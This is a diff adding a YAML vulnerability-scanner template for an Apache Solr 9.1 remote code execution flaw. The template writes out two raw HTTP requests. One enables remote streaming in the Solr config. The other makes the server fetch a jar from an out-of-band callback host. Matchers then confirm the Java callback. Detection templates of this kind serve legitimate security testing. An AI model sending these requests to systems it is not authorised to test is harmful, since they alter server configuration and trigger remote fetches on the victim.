diff --git a/http/vulnerabilities/apache/apache-solr-rce.yaml b/http/vulnerabilities/apache/apache-solr-rce.yaml
new file mode 100644
index 0000000000..de21fc6b71
--- /dev/null
+++ b/http/vulnerabilities/apache/apache-solr-rce.yaml
@@ -0,0 +1,43 @@
+id: apache-solr-rce
+
+info:
+  name: Apache Solr 9.1 - Remote Code Execution
+  author: j4vaovo
+  severity: critical
+  reference:
+    - https://web.archive.org/web/20230414152023/https://noahblog.360.cn/apache-solr-rce/
+  metadata:
+    max-request: 2
+  tags: solr,apache,rce,oast
+
+http:
+  - raw:
+      - |
+        POST /solr/gettingstarted_shard1_replica_n1/config HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {  "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
+
+      - |
+        POST /solr/gettingstarted_shard2_replica_n1/debug/dump?param=ContentStreams HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=------------------------5897997e44b07bf9
+
+        --------------------------5897997e44b07bf9
+        Content-Disposition: form-data; name="stream.url"
+
+        jar:http://{{interactsh-url}}/test.jar?!/Test.class
+        --------------------------5897997e44b07bf9--
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: word
+        part: interactsh_request
+        words:
+          - "User-Agent: Java"